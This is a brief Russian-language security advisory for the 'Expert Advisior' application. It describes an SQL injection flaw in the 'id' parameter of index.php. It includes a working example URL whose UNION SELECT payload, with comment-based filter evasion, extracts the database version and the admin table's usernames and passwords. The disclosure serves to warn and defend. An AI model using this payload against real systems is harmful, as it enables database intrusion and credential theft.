Программа: Expert Advisior

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/* */ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e, username,0x3a,password,0x3c623e),9,10,11, 12,13,14,15/**/FROM/**/admin/*

Оставить мнение